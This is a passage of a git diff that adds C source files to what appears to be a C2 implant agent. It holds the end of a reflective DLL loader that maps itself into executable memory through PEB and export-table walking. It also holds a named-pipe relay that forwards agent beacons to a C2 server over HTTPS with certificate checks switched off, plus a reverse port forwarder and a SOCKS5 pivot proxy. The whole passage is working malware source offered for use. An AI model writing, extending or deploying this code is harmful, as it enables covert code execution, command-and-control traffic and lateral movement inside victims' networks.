0x20)) return 0; + } + return 1; +} + +/* find kernel32 base via PEB walk */ + +static ULONG_PTR _find_kernel32(void) +{ +#ifdef _WIN64 + MY_PEB *peb = (MY_PEB *)__readgsqword(0x60); +#else + MY_PEB *peb = (MY_PEB *)__readfsdword(0x30); +#endif + PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList; + PLIST_ENTRY cur = head->Flink; + while (cur != head) { + MY_LDR_ENTRY *e = CONTAINING_RECORD(cur, MY_LDR_ENTRY, InMemoryOrderLinks); + if (e->BaseDllName.Length >= 24 && + _weq12(e->BaseDllName.Buffer, "kernel32.dll")) + return (ULONG_PTR)e->DllBase; + cur = cur->Flink; + } + return 0; +} + +/* find export by name via EAT walk */ + +static ULONG_PTR _get_proc(ULONG_PTR mod, const char *name) +{ + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)mod; + PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(mod + dos->e_lfanew); + PIMAGE_EXPORT_DIRECTORY exp; + DWORD rva = nt->OptionalHeader + .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] + .VirtualAddress; + if (!rva) return 0; + exp = (PIMAGE_EXPORT_DIRECTORY)(mod + rva); + + DWORD *names = (DWORD *)(mod + exp->AddressOfNames); + WORD *ords = (WORD *)(mod + exp->AddressOfNameOrdinals); + DWORD *funcs = (DWORD *)(mod + exp->AddressOfFunctions); + + for (DWORD i = 0; i < exp->NumberOfNames; i++) { + if (_eqstr((char *)(mod + names[i]), name)) + return mod + funcs[ords[i]]; + } + return 0; +} + +/* find own PE base by scanning backwards from current IP */ + +static ULONG_PTR _find_own_base(void) +{ + ULONG_PTR ip = (ULONG_PTR)_find_own_base & ~0xFFFUL; + for (int i = 0; i < 4096; i++, ip -= 0x1000) { + if (*(WORD *)ip != IMAGE_DOS_SIGNATURE) continue; + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ip; + if ((ULONG_PTR)dos->e_lfanew > 0x400) continue; + PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(ip + dos->e_lfanew); + if (nt->Signature == IMAGE_NT_SIGNATURE && + nt->OptionalHeader.SizeOfImage > 0) + return ip; + } + return 0; +} + +/* reflective loader entry point */ + +__declspec(dllexport) +ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter) +{ + (void)lpParameter; + + /* 1. bootstrap: resolve needed kernel32 functions */ + ULONG_PTR k32 = _find_kernel32(); + if (!k32) return 0; + + pLoadLibraryA_t fLoadLibraryA = (pLoadLibraryA_t )_get_proc(k32, "LoadLibraryA"); + pGetProcAddress_t fGetProcAddress = (pGetProcAddress_t )_get_proc(k32, "GetProcAddress"); + pVirtualAlloc_t fVirtualAlloc = (pVirtualAlloc_t )_get_proc(k32, "VirtualAlloc"); + pFlushInstructionCache_t fFlushIC = (pFlushInstructionCache_t)_get_proc(k32, "FlushInstructionCache"); + pGetCurrentProcess_t fGetCurrentProc = (pGetCurrentProcess_t )_get_proc(k32, "GetCurrentProcess"); + + if (!fLoadLibraryA || !fGetProcAddress || !fVirtualAlloc) return 0; + + /* 2. find own raw PE base */ + ULONG_PTR src = _find_own_base(); + if (!src) return 0; + + PIMAGE_DOS_HEADER srcDos = (PIMAGE_DOS_HEADER)src; + PIMAGE_NT_HEADERS srcNt = (PIMAGE_NT_HEADERS)(src + srcDos->e_lfanew); + DWORD imgSz = srcNt->OptionalHeader.SizeOfImage; + DWORD hdrSz = srcNt->OptionalHeader.SizeOfHeaders; + + /* 3. allocate target image, try preferred base first */ + ULONG_PTR dst = (ULONG_PTR)fVirtualAlloc( + (LPVOID)srcNt->OptionalHeader.ImageBase, + imgSz, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!dst) + dst = (ULONG_PTR)fVirtualAlloc( + NULL, imgSz, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!dst) return 0; + + /* 4. copy PE headers */ + { + uint8_t *s = (uint8_t *)src; + uint8_t *d = (uint8_t *)dst; + for (DWORD i = 0; i < hdrSz; i++) d[i] = s[i]; + } + + /* 5. copy sections */ + { + PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(srcNt); + for (WORD i = 0; i < srcNt->FileHeader.NumberOfSections; i++, sec++) { + uint8_t *secSrc = (uint8_t *)(src + sec->VirtualAddress); + uint8_t *secDst = (uint8_t *)(dst + sec->VirtualAddress); + DWORD sz = sec->SizeOfRawData ? sec->SizeOfRawData : sec->Misc.VirtualSize; + for (DWORD j = 0; j < sz; j++) secDst[j] = secSrc[j]; + } + } + + /* 6. apply base relocations */ + PIMAGE_NT_HEADERS dstNt = (PIMAGE_NT_HEADERS)(dst + ((PIMAGE_DOS_HEADER)dst)->e_lfanew); + LONG_PTR delta = (LONG_PTR)(dst - srcNt->OptionalHeader.ImageBase); + + { + DWORD rva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; + DWORD sz = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + if (delta && rva && sz) { + PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(dst + rva); + while (reloc->VirtualAddress && reloc->SizeOfBlock) { + ULONG_PTR page = dst + reloc->VirtualAddress; + WORD *entry = (WORD *)((uint8_t *)reloc + sizeof(IMAGE_BASE_RELOCATION)); + DWORD cnt = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); + for (DWORD i = 0; i < cnt; i++) { + int type = entry[i] >> 12; + DWORD off = entry[i] & 0x0FFF; +#ifdef _WIN64 + if (type == IMAGE_REL_BASED_DIR64) + *(ULONG_PTR *)(page + off) += (ULONG_PTR)delta; +#endif + if (type == IMAGE_REL_BASED_HIGHLOW) + *(DWORD *)(page + off) += (DWORD)delta; + } + reloc = (PIMAGE_BASE_RELOCATION)((uint8_t *)reloc + reloc->SizeOfBlock); + } + } + } + + /* 7. resolve imports */ + { + DWORD rva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (rva) { + PIMAGE_IMPORT_DESCRIPTOR imp = (PIMAGE_IMPORT_DESCRIPTOR)(dst + rva); + for (; imp->Name; imp++) { + char *dllName = (char *)(dst + imp->Name); + HMODULE hLib = fLoadLibraryA(dllName); + if (!hLib) continue; + IMAGE_THUNK_DATA *iat = (IMAGE_THUNK_DATA *)(dst + imp->FirstThunk); + IMAGE_THUNK_DATA *ont = imp->OriginalFirstThunk + ? (IMAGE_THUNK_DATA *)(dst + imp->OriginalFirstThunk) + : iat; + for (; ont->u1.AddressOfData; ont++, iat++) { + FARPROC proc; + if (IMAGE_SNAP_BY_ORDINAL(ont->u1.Ordinal)) + proc = fGetProcAddress(hLib, (LPCSTR)IMAGE_ORDINAL(ont->u1.Ordinal)); + else { + PIMAGE_IMPORT_BY_NAME ibn = + (PIMAGE_IMPORT_BY_NAME)(dst + (DWORD)ont->u1.AddressOfData); + proc = fGetProcAddress(hLib, (LPCSTR)ibn->Name); + } + iat->u1.Function = (ULONG_PTR)proc; + } + } + } + } + + /* 8. flush instruction cache */ + if (fFlushIC && fGetCurrentProc) + fFlushIC(fGetCurrentProc(), (LPVOID)dst, imgSz); + + /* 9. Call DllMain */ + pDllMain_t fDllMain = (pDllMain_t)(dst + dstNt->OptionalHeader.AddressOfEntryPoint); + fDllMain((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL); + + return dst; +} +#endif /* _REFLECTIVE_DLL */ diff --git a/agent/src/relay/smb_relay.c b/agent/src/relay/smb_relay.c new file mode 100644 index 0000000..374f4f7 --- /dev/null +++ b/agent/src/relay/smb_relay.c @@ -0,0 +1,299 @@ +#include +#include +#include +#include +#include +#include + +#define RELAY_BUF 262144 /* 256 KB max payload */ +#define PIPE_INSTANCES 1 /* one agent at a time; increase for concurrent */ +#define C2_TIMEOUT_MS 30000 + +static int g_verbose = 0; + +#define LOG(fmt, ...) \ + do \ + { \ + if (g_verbose) \ + fprintf(stdout, "[relay] " fmt "\n", ##__VA_ARGS__); \ + } while (0) +#define ERR(fmt, ...) fprintf(stderr, "[relay] ERROR " fmt "\n", ##__VA_ARGS__) + +/* pipe I/O helpers */ + +static BOOL pipe_read_exact(HANDLE h, void *buf, DWORD len) +{ + DWORD done = 0; + while (done < len) + { + DWORD nr = 0; + if (!ReadFile(h, (char *)buf + done, len - done, &nr, NULL) || nr == 0) + return FALSE; + done += nr; + } + return TRUE; +} + +static BOOL pipe_write_exact(HANDLE h, const void *buf, DWORD len) +{ + DWORD done = 0; + while (done < len) + { + DWORD nw = 0; + if (!WriteFile(h, (const char *)buf + done, len - done, &nw, NULL) || nw == 0) + return FALSE; + done += nw; + } + return TRUE; +} + +/* wide-string helper */ + +static wchar_t *to_wide(const char *s) +{ + int n = MultiByteToWideChar(CP_UTF8, 0, s, -1, NULL, 0); + if (n <= 0) + return NULL; + wchar_t *w = (wchar_t *)malloc((size_t)n * sizeof(wchar_t)); + if (w) + MultiByteToWideChar(CP_UTF8, 0, s, -1, w, n); + return w; +} + +/* ---- WinHTTP POST → C2 ---- */ + +static char *c2_post(const char *url, const char *body_json) +{ + wchar_t *url_w = to_wide(url); + if (!url_w) + return NULL; + + wchar_t host[512] = {0}; + wchar_t path[1024] = {0}; + + URL_COMPONENTS uc = {0}; + uc.dwStructSize = sizeof(uc); + uc.lpszHostName = host; + uc.dwHostNameLength = 512; + uc.lpszUrlPath = path; + uc.dwUrlPathLength = 1024; + + if (!WinHttpCrackUrl(url_w, 0, 0, &uc)) + { + free(url_w); + return NULL; + } + free(url_w); + + BOOL secure = (uc.nScheme == INTERNET_SCHEME_HTTPS); + INTERNET_PORT port = uc.nPort ? uc.nPort : (INTERNET_PORT)(secure ? 443 : 80); + + HINTERNET hSess = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64)", + WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, + WINHTTP_NO_PROXY_NAME, + WINHTTP_NO_PROXY_BYPASS, 0); + if (!hSess) + return NULL; + + HINTERNET hConn = WinHttpConnect(hSess, host, port, 0); + if (!hConn) + { + WinHttpCloseHandle(hSess); + return NULL; + } + + DWORD flags = secure ? WINHTTP_FLAG_SECURE : 0; + HINTERNET hReq = WinHttpOpenRequest(hConn, L"POST", + path[0] ? path : L"/", + NULL, WINHTTP_NO_REFERER, + WINHTTP_DEFAULT_ACCEPT_TYPES, flags); + if (!hReq) + { + WinHttpCloseHandle(hConn); + WinHttpCloseHandle(hSess); + return NULL; + } + + WinHttpAddRequestHeaders(hReq, + L"Content-Type: application/json\r\nAccept: application/json", + (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + + /* skip cert validation for self-signed C2 certs */ + if (secure) + { + DWORD opt = SECURITY_FLAG_IGNORE_UNKNOWN_CA | + SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | + SECURITY_FLAG_IGNORE_CERT_CN_INVALID | + SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; + WinHttpSetOption(hReq, WINHTTP_OPTION_SECURITY_FLAGS, &opt, sizeof(opt)); + } + + WinHttpSetTimeouts(hReq, C2_TIMEOUT_MS, C2_TIMEOUT_MS, + C2_TIMEOUT_MS, C2_TIMEOUT_MS); + + DWORD body_len = (DWORD)strlen(body_json); + BOOL ok = WinHttpSendRequest(hReq, + WINHTTP_NO_ADDITIONAL_HEADERS, 0, + (LPVOID)body_json, body_len, body_len, 0); + if (!ok || !WinHttpReceiveResponse(hReq, NULL)) + { + WinHttpCloseHandle(hReq); + WinHttpCloseHandle(hConn); + WinHttpCloseHandle(hSess); + return NULL; + } + + /* read response */ + char *resp = NULL; + size_t resp_len = 0; + DWORD avail = 0; + + while (WinHttpQueryDataAvailable(hReq, &avail) && avail > 0) + { + char *tmp = (char *)realloc(resp, resp_len + avail + 1); + if (!tmp) + break; + resp = tmp; + DWORD nr = 0; + WinHttpReadData(hReq, resp + resp_len, avail, &nr); + resp_len += nr; + resp[resp_len] = '\0'; + } + + WinHttpCloseHandle(hReq); + WinHttpCloseHandle(hConn); + WinHttpCloseHandle(hSess); + + return resp; +} + +/* relay loop: read from pipe, forward to C2, write response back */ + +static void relay_loop(HANDLE hPipe, const char *c2_url) +{ + char *in_buf = (char *)malloc(RELAY_BUF); + char *out_buf = (char *)malloc(RELAY_BUF); + if (!in_buf || !out_buf) + { + ERR("malloc failed"); + free(in_buf); + free(out_buf); + return; + } + + for (;;) + { + LOG("waiting for agent connection..."); + + /* wait for agent to connect */ + BOOL connected = ConnectNamedPipe(hPipe, NULL) + ? TRUE + : (GetLastError() == ERROR_PIPE_CONNECTED); + if (!connected) + { + ERR("ConnectNamedPipe failed (%lu)", GetLastError()); + break; + } + LOG("agent connected"); + + /* read beacon: 4-byte LE length + payload */ + uint32_t in_len = 0; + if (!pipe_read_exact(hPipe, &in_len, 4) || in_len == 0 || in_len >= RELAY_BUF) + { + ERR("bad beacon length %u", in_len); + goto next; + } + if (!pipe_read_exact(hPipe, in_buf, in_len)) + { + ERR("pipe read beacon failed"); + goto next; + } + in_buf[in_len] = '\0'; + LOG("beacon recv %u bytes", in_len); + + /* forward to C2 */ + char *resp = c2_post(c2_url, in_buf); + if (!resp) + { + ERR("c2_post failed — sending empty task"); + resp = strdup("{\"p\":\"\"}"); + if (!resp) + goto next; + } + LOG("c2 response: %.80s", resp); + + /* write task back: 4-byte LE length + C2 response */ + uint32_t out_len = (uint32_t)strlen(resp); + BOOL ok = pipe_write_exact(hPipe, &out_len, 4) && + pipe_write_exact(hPipe, resp, out_len); + free(resp); + + if (!ok) + ERR("pipe write task failed"); + else + LOG("task sent %u bytes", out_len); + + next: + FlushFileBuffers(hPipe); + DisconnectNamedPipe(hPipe); + LOG("disconnected, looping"); + } + + free(in_buf); + free(out_buf); +} + +/* entry point */ + +int main(int argc, char **argv) +{ + const char *pipe_name = NULL; + const char *c2_url = NULL; + + for (int i = 1; i < argc; i++) + { + if (strcmp(argv[i], "--pipe") == 0 && i + 1 < argc) + pipe_name = argv[++i]; + else if (strcmp(argv[i], "--c2") == 0 && i + 1 < argc) + c2_url = argv[++i]; + else if (strcmp(argv[i], "--verbose") == 0) + g_verbose = 1; + } + + if (!pipe_name || !c2_url) + { + fprintf(stderr, "usage: smb_relay.exe --pipe --c2 [--verbose]\n"); + return 1; + } + + char full_pipe[512]; + snprintf(full_pipe, sizeof(full_pipe), "\\\\.\\pipe\\%s", pipe_name); + + wchar_t full_pipe_w[512]; + MultiByteToWideChar(CP_UTF8, 0, full_pipe, -1, full_pipe_w, 512); + + LOG("creating pipe %s", full_pipe); + LOG("c2 url: %s", c2_url); + + HANDLE hPipe = CreateNamedPipeW( + full_pipe_w, + PIPE_ACCESS_DUPLEX, + PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT, + PIPE_INSTANCES, + RELAY_BUF, RELAY_BUF, + 0, /* default timeout */ + NULL /* default security */ + ); + + if (hPipe == INVALID_HANDLE_VALUE) + { + ERR("CreateNamedPipe failed (%lu)", GetLastError()); + return 1; + } + + LOG("pipe created, entering relay loop"); + relay_loop(hPipe, c2_url); + + CloseHandle(hPipe); + return 0; +} diff --git a/agent/src/socks/rportfwd.c b/agent/src/socks/rportfwd.c new file mode 100644 index 0000000..a09ebe8 --- /dev/null +++ b/agent/src/socks/rportfwd.c @@ -0,0 +1,300 @@ +#include "socks.h" +#include +#include +#include +#include +#include +#include + +#define RPORTFWD_BUF 65536 +#define RPORTFWD_MAX 16 + +typedef struct +{ + unsigned short lport; + char rhost[256]; + unsigned short rport; + SOCKET lsock; + HANDLE thread; + volatile LONG running; +} fwd_entry_t; + +static fwd_entry_t g_fwds[RPORTFWD_MAX]; +static CRITICAL_SECTION g_lock; +static LONG g_init = 0; + +static void _init(void) +{ + if (InterlockedCompareExchange(&g_init, 1, 0) == 0) + { + InitializeCriticalSection(&g_lock); + for (int i = 0; i < RPORTFWD_MAX; i++) + { + memset(&g_fwds[i], 0, sizeof(g_fwds[i])); + g_fwds[i].lsock = INVALID_SOCKET; + } + } +} + +/* per-connection relay context */ +typedef struct +{ + SOCKET client; + char rhost[256]; + unsigned short rport; +} relay_arg_t; + +static DWORD WINAPI _relay_thread(LPVOID arg) +{ + relay_arg_t *ra = (relay_arg_t *)arg; + SOCKET cli = ra->client; + + char portstr[8]; + snprintf(portstr, sizeof(portstr), "%u", ra->rport); + + struct addrinfo hints, *res = NULL; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + + SOCKET rem = INVALID_SOCKET; + if (getaddrinfo(ra->rhost, portstr, &hints, &res) == 0 && res) + { + rem = socket(res->ai_family, SOCK_STREAM, IPPROTO_TCP); + if (rem != INVALID_SOCKET) + { + if (connect(rem, res->ai_addr, (int)res->ai_addrlen) != 0) + { + closesocket(rem); + rem = INVALID_SOCKET; + } + } + freeaddrinfo(res); + } + + if (rem == INVALID_SOCKET) + { + closesocket(cli); + free(ra); + return 0; + } + + char *buf = (char *)malloc(RPORTFWD_BUF); + if (buf) + { + for (;;) + { + fd_set rd; + FD_ZERO(&rd); + FD_SET(cli, &rd); + FD_SET(rem, &rd); + SOCKET mx = (cli > rem ? cli : rem) + 1; + struct timeval tv = {30, 0}; + if (select((int)mx, &rd, NULL, NULL, &tv) <= 0) + break; + if (FD_ISSET(cli, &rd)) + { + int n = recv(cli, buf, RPORTFWD_BUF, 0); + if (n <= 0 || send(rem, buf, n, 0) <= 0) + break; + } + if (FD_ISSET(rem, &rd)) + { + int n = recv(rem, buf, RPORTFWD_BUF, 0); + if (n <= 0 || send(cli, buf, n, 0) <= 0) + break; + } + } + free(buf); + } + + closesocket(rem); + closesocket(cli); + free(ra); + return 0; +} + +static DWORD WINAPI _listener_thread(LPVOID arg) +{ + fwd_entry_t *e = (fwd_entry_t *)arg; + + while (e->running && e->lsock != INVALID_SOCKET) + { + struct sockaddr_in peer; + int plen = sizeof(peer); + SOCKET cli = accept(e->lsock, (struct sockaddr *)&peer, &plen); + if (cli == INVALID_SOCKET) + break; + + relay_arg_t *ra = (relay_arg_t *)malloc(sizeof(relay_arg_t)); + if (!ra) + { + closesocket(cli); + continue; + } + ra->client = cli; + strncpy(ra->rhost, e->rhost, 255); + ra->rhost[255] = '\0'; + ra->rport = e->rport; + + HANDLE ht = CreateThread(NULL, 0, _relay_thread, ra, 0, NULL); + if (!ht) + { + closesocket(cli); + free(ra); + continue; + } + CloseHandle(ht); + } + + InterlockedExchange(&e->running, 0); + return 0; +} + +/* public API */ + +int rportfwd_start(unsigned short lport, const char *rhost, unsigned short rport, + char *out, size_t outsz) +{ + _init(); + + WSADATA wsa; + WSAStartup(MAKEWORD(2, 2), &wsa); + + EnterCriticalSection(&g_lock); + + for (int i = 0; i < RPORTFWD_MAX; i++) + { + if (g_fwds[i].running && g_fwds[i].lport == lport) + { + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] port %u already active\n", lport); + return -1; + } + } + + int slot = -1; + for (int i = 0; i < RPORTFWD_MAX; i++) + { + if (!g_fwds[i].running) + { + slot = i; + break; + } + } + if (slot < 0) + { + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] max %d forwards reached\n", RPORTFWD_MAX); + return -1; + } + + fwd_entry_t *e = &g_fwds[slot]; + e->lport = lport; + strncpy(e->rhost, rhost, 255); + e->rhost[255] = '\0'; + e->rport = rport; + + e->lsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (e->lsock == INVALID_SOCKET) + { + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] socket() failed: %d\n", WSAGetLastError()); + return -1; + } + + int opt = 1; + setsockopt(e->lsock, SOL_SOCKET, SO_REUSEADDR, (char *)&opt, sizeof(opt)); + + struct sockaddr_in sa; + memset(&sa, 0, sizeof(sa)); + sa.sin_family = AF_INET; + sa.sin_addr.s_addr = INADDR_ANY; + sa.sin_port = htons(lport); + + if (bind(e->lsock, (struct sockaddr *)&sa, sizeof(sa)) != 0 || + listen(e->lsock, SOMAXCONN) != 0) + { + closesocket(e->lsock); + e->lsock = INVALID_SOCKET; + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] bind/listen %u failed: %d\n", + lport, WSAGetLastError()); + return -1; + } + + InterlockedExchange(&e->running, 1); + e->thread = CreateThread(NULL, 0, _listener_thread, e, 0, NULL); + if (!e->thread) + { + closesocket(e->lsock); + e->lsock = INVALID_SOCKET; + InterlockedExchange(&e->running, 0); + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] CreateThread failed\n"); + return -1; + } + + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] 0.0.0.0:%u → %s:%u\n", lport, rhost, rport); + return 0; +} + +int rportfwd_stop(unsigned short lport, char *out, size_t outsz) +{ + _init(); + EnterCriticalSection(&g_lock); + + for (int i = 0; i < RPORTFWD_MAX; i++) + { + fwd_entry_t *e = &g_fwds[i]; + if (e->running && e->lport == lport) + { + InterlockedExchange(&e->running, 0); + if (e->lsock != INVALID_SOCKET) + { + closesocket(e->lsock); + e->lsock = INVALID_SOCKET; + } + if (e->thread) + { + WaitForSingleObject(e->thread, 2000); + CloseHandle(e->thread); + e->thread = NULL; + } + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] stopped port %u\n", lport); + return 0; + } + } + + LeaveCriticalSection(&g_lock); + snprintf(out, outsz, "[rportfwd] port %u not found\n", lport); + return -1; +} + +int rportfwd_list(char *out, size_t outsz) +{ + _init(); + EnterCriticalSection(&g_lock); + + size_t pos = 0; + int found = 0; + for (int i = 0; i < RPORTFWD_MAX; i++) + { + fwd_entry_t *e = &g_fwds[i]; + if (!e->running) + continue; + int n = snprintf(out + pos, outsz - pos, + "[rportfwd] 0.0.0.0:%u → %s:%u\n", + e->lport, e->rhost, e->rport); + if (n > 0) + pos += (size_t)n; + found++; + } + if (!found) + snprintf(out, outsz, "[rportfwd] no active forwards\n"); + + LeaveCriticalSection(&g_lock); + return 0; +} diff --git a/agent/src/socks/socks.c b/agent/src/socks/socks.c new file mode 100644 index 0000000..699220c --- /dev/null +++ b/agent/src/socks/socks.c @@ -0,0 +1,266 @@ +#include "socks.h" +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32.lib") + +#define SOCKS_BUF 65536 +#define SOCKS_AUTH_NONE 0x00 +#define SOCKS_CMD_CONNECT 0x01 +#define SOCKS_ATYP_IPV4 0x01 +#define SOCKS_ATYP_FQDN 0x03 +#define SOCKS_ATYP_IPV6 0x04 + +static SOCKET g_listen = INVALID_SOCKET; +static HANDLE g_thread = NULL; +static volatile LONG g_running = 0; + +/* per-client relay context */ +typedef struct { SOCKET client; SOCKET remote; } relay_t; + +static int _recv_all(SOCKET s, char *buf, int n) +{ + int got = 0; + while (got < n) { + int r = recv(s, buf + got, n - got, 0); + if (r <= 0) return -1; + got += r; + } + return got; +} + +static void _relay(SOCKET c, SOCKET r) +{ + char *buf = (char *)malloc(SOCKS_BUF); + if (!buf) return; + + while (1) { + fd_set rd; + FD_ZERO(&rd); + FD_SET(c, &rd); + FD_SET(r, &rd); + SOCKET maxfd = (c > r ? c : r) + 1; + + struct timeval tv = {30, 0}; + int rc = select((int)maxfd, &rd, NULL, NULL, &tv); + if (rc <= 0) break; + + if (FD_ISSET(c, &rd)) { + int n = recv(c, buf, SOCKS_BUF, 0); + if (n <= 0) break; + if (send(r, buf, n, 0) <= 0) break; + } + if (FD_ISSET(r, &rd)) { + int n = recv(r, buf, SOCKS_BUF, 0); + if (n <= 0) break; + if (send(c, buf, n, 0) <= 0) break; + } + } + free(buf); +} + +/* client handler thread */ +static DWORD WINAPI _client_thread(LPVOID arg) +{ + relay_t *ctx = (relay_t *)arg; + SOCKET cli = ctx->client; + free(ctx); + + char buf[512]; + + /* step 1: version + method negotiation */ + if (_recv_all(cli, buf, 2) < 0) goto done; + if ((unsigned char)buf[0] != 5) goto done; /* not SOCKS5 */ + + int nmeth = (unsigned char)buf[1]; + if (nmeth < 1 || nmeth > 255) goto done; + if (_recv_all(cli, buf, nmeth) < 0) goto done; + + /* Respond: SOCKS5, no-auth */ + char reply2[2] = {5, SOCKS_AUTH_NONE}; + send(cli, reply2, 2, 0); + + /* step 2: parse SOCKS5 request */ + if (_recv_all(cli, buf, 4) < 0) goto done; + /* buf[0]=5, buf[1]=cmd, buf[2]=0, buf[3]=atyp */ + if ((unsigned char)buf[0] != 5) goto done; + if ((unsigned char)buf[1] != SOCKS_CMD_CONNECT) { + /* Command not supported */ + char err[10] = {5,7,0,1, 0,0,0,0, 0,0}; + send(cli, err, sizeof(err), 0); + goto done; + } + + char host[256] = {0}; + unsigned short port = 0; + unsigned char atyp = (unsigned char)buf[3]; + + if (atyp == SOCKS_ATYP_IPV4) { + unsigned char ipb[4]; + if (_recv_all(cli, (char *)ipb, 4) < 0) goto done; + if (_recv_all(cli, (char *)&port, 2) < 0) goto done; + port = ntohs(port); + snprintf(host, sizeof(host), "%u.%u.%u.%u", + ipb[0], ipb[1], ipb[2], ipb[3]); + + } else if (atyp == SOCKS_ATYP_FQDN) { + unsigned char len; + if (_recv_all(cli, (char *)&len, 1) < 0) goto done; + if (_recv_all(cli, host, len) < 0) goto done; + host[len] = '\0'; + if (_recv_all(cli, (char *)&port, 2) < 0) goto done; + port = ntohs(port); + + } else { + /* IPv6 not supported — send error */ + char err[10] = {5,8,0,1, 0,0,0,0, 0,0}; + send(cli, err, sizeof(err), 0); + goto done; + } + + /* step 3: connect to target host */ + struct addrinfo hints, *res = NULL; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_INET; + hints.ai_socktype = SOCK_STREAM; + + char portstr[8]; + snprintf(portstr, sizeof(portstr), "%u", port); + if (getaddrinfo(host, portstr, &hints, &res) != 0 || !res) { + char err[10] = {5,4,0,1, 0,0,0,0, 0,0}; + send(cli, err, sizeof(err), 0); + goto done; + } + + SOCKET rem = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (rem == INVALID_SOCKET) { + freeaddrinfo(res); + char err[10] = {5,1,0,1, 0,0,0,0, 0,0}; + send(cli, err, sizeof(err), 0); + goto done; + } + + if (connect(rem, res->ai_addr, (int)res->ai_addrlen) != 0) { + freeaddrinfo(res); + closesocket(rem); + char err[10] = {5,5,0,1, 0,0,0,0, 0,0}; + send(cli, err, sizeof(err), 0); + goto done; + } + freeaddrinfo(res); + + /* Success reply: 5 0 0 1 0.0.0.0:0 */ + char ok[10] = {5,0,0,1, 0,0,0,0, 0,0}; + send(cli, ok, sizeof(ok), 0); + + /* step 4: relay traffic */ + _relay(cli, rem); + closesocket(rem); + +done: + closesocket(cli); + return 0; +} + +/* listener thread */ +static DWORD WINAPI _listen_thread(LPVOID arg) +{ + (void)arg; + while (g_running && g_listen != INVALID_SOCKET) { + struct sockaddr_in peer; + int plen = sizeof(peer); + SOCKET cli = accept(g_listen, (struct sockaddr *)&peer, &plen); + if (cli == INVALID_SOCKET) break; + + relay_t *ctx = (relay_t *)malloc(sizeof(relay_t)); + if (!ctx) { closesocket(cli); continue; } + ctx->client = cli; + ctx->remote = INVALID_SOCKET; + + HANDLE ht = CreateThread(NULL, 0, _client_thread, ctx, 0, NULL); + if (!ht) { closesocket(cli); free(ctx); continue; } + CloseHandle(ht); + } + InterlockedExchange(&g_running, 0); + return 0; +} + +/* public API */ + +int socks_start(unsigned short port, char *out, size_t outsz) +{ + if (InterlockedCompareExchange(&g_running, 1, 0) != 0) { + snprintf(out, outsz, "[socks] already running\n"); + return -1; + } + + WSADATA wsa; + WSAStartup(MAKEWORD(2,2), &wsa); + + g_listen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (g_listen == INVALID_SOCKET) { + InterlockedExchange(&g_running, 0); + snprintf(out, outsz, "[socks] socket() failed: %d\n", WSAGetLastError()); + return -1; + } + + int opt = 1; + setsockopt(g_listen, SOL_SOCKET, SO_REUSEADDR, (char *)&opt, sizeof(opt)); + + struct sockaddr_in sa; + memset(&sa, 0, sizeof(sa)); + sa.sin_family = AF_INET; + sa.sin_addr.s_addr = INADDR_ANY; + sa.sin_port = htons(port); + + if (bind(g_listen, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + closesocket(g_listen); g_listen = INVALID_SOCKET; + InterlockedExchange(&g_running, 0); + snprintf(out, outsz, "[socks] bind %u failed: %d\n", port, WSAGetLastError()); + return -1; + } + + if (listen(g_listen, SOMAXCONN) != 0) { + closesocket(g_listen); g_listen = INVALID_SOCKET; + InterlockedExchange(&g_running, 0); + snprintf(out, outsz, "[socks] listen failed: %d\n", WSAGetLastError()); + return -1; + } + + g_thread = CreateThread(NULL, 0, _listen_thread, NULL, 0, NULL); + if (!g_thread) { + closesocket(g_listen); g_listen = INVALID_SOCKET; + InterlockedExchange(&g_running, 0); + snprintf(out, outsz, "[socks] thread failed\n"); + return -1; + } + + snprintf(out, outsz, "[socks] listener up on 0.0.0.0:%u\n", port); + return 0; +} + +int socks_stop(char *out, size_t outsz) +{ + if (!g_running) { + snprintf(out, outsz, "[socks] not running\n"); + return -1; + } + InterlockedExchange(&g_running, 0); + if (g_listen != INVALID_SOCKET) { + closesocket(g_listen); + g_listen = INVALID_SOCKET; + } + if (g_thread) { + WaitForSingleObject(g_thread, 3000); + CloseHandle(g_thread); + g_thread = NULL; + } + snprintf(out, outsz, "[socks] stopped\n"); + return 0; +} + +int socks_running(void) { return (int)g_running; } diff --git 